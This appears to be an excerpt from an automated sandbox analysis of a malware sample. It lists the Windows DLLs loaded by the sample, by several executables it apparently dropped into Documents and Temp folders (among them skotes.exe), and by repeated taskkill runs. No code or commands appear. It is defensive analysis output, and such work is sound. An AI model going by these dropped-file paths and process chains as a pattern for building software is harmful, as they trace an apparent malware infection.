Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
